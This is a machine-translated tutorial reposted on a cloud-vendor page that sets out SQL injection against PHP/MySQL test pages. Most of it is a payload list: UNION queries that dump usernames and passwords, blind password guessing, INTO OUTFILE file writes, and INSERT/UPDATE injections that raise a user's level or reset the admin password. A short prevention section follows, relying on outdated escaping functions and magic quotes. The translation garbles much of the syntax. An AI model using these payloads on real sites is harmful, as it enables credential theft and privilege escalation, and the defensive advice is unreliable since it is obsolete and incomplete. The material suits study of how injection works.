Home > Developer > PHP

Php SQL injection implementation (good test code security)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
To learn how hackers intrude into the system, we recommend that you test the results first when writing php code. The focus of SQL injection is to construct SQL statements. Only SQL statements can be used flexibly.
Statement can be used to construct the cou injection string. After completing the course, I wrote some notes and made them ready for use at any time. I hope you have read the following content first.
The basic principle of SQL. The code in the note comes from the network.
=== Basic part ===
This table query:
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LENGTH (password) = '6
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LEFT (password, 1) ='m

Union statement:
Http: // 127.0.0.1/injection/show. php? Id = 1 'Union select 1, username, password from user /*
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user /*

Export file:
Http: // 127.0.0.1/injection/user. php? Username = angel 'into outfile' c:/file.txt
Http: // 127.0.0.1/injection/user. php? Username = 'or 1 = 1 into outfile 'C:/file.txt
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user into outfile 'C:/user.txt

INSERT statement:
Insert into 'user' (userid, username, password, homepage, userlevel) VALUES ('', '$ username',' $ password', '$ homepage ', '1 ');
Construct homepage value: http://4ngel.net ', '3 ')#
The SQL statement changes to: INSERT INTO 'user' (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http: // 4ngel.net ', '3') #', '1 ');

UPDATE statement: I like this.
First understand this SQL statement
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id =' $ ID'
If the SQL statement is modified to the following format, the injection is implemented.
1: Change the homepage value
Http://4ngel.net ', userlevel = '3
Then the SQL statement becomes
UPDATE user SET password = 'mypass', homepage = 'http: // 4ngel.net ', userlevel = '3' WHERE id =' $ ID'
Userlevel: user level
2: change the password value
Mypass) 'Where username = 'admin '#
Then the SQL statement becomes
UPDATE user SET password = 'md5 (mypass) 'WHERE username = 'admin' #)', homepage = '$ homepage' WHERE id = '$ ID'
3: Change the id value
'OR username = 'admin'
Then the SQL statement becomes
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id = ''OR username = 'admin'

=== Advanced section ===
Common MySQL built-in functions
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
Database ()
Version ()
SUBSTRING ()
MID ()
Char ()
Load_file ()
......
Function applications
UPDATE article SET title = DATABASE () WHERE id = 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, database (), version ()
SELECT * FROM user WHERE username = char (97,110,103,101,108)
# Char (97,110,103,101,108) is equivalent to angel, decimal
Http: // 127.0.0.1/injection/user. php? Userid = 1 and password = char (109,121,112, 97,115,115) http: // 127.0.0.1/injection/user. php? Userid = 1 and LEFT (password, 1)> char (100)
Http: // 127.0.0.1/injection/user. php? Userid = 1 and ord (mid (password, 111)>

Determine the number and type of fields in the data structure
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select char (97), char (97), char (97)

Guess data table name
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1 from members

Obtain the user name and password from a cross-table query.
Http: // 127.0.0.1/ymdown/show. php? Id = 10000 union select 1, username, 1, password, 1 from ymdown_user where id = 1

Others
# Verify the first password
Http: // 127.0.0.1/ymdown/show. php? Id = 10 union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49

=== Injection prevention ===
Server
Set magic_quotes_gpc to On
Display_errors is set to Off
Encoding
$ Keywords = addslashes ($ keywords );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
Value type
Use intval () to capture and replace
String type
Single quotation marks must be added to SQL statement parameters.
The following code is used to prevent injection.
If (get_magic_quotes_gpc ()){
//....
} Else {
$ Str = mysql_real_escape_string ($ str );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
}
Useful functions
Stripslashes ()
Get_magic_quotes_gpc ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
References:
Http://www.4ngel.net/article/36.htm (SQL Injection with MySQL) Chinese
Http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
sql injection test page sql injection test string sql injection security web security sql injection basic sql injection test sql injection attack test codeigniter sql injection security

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More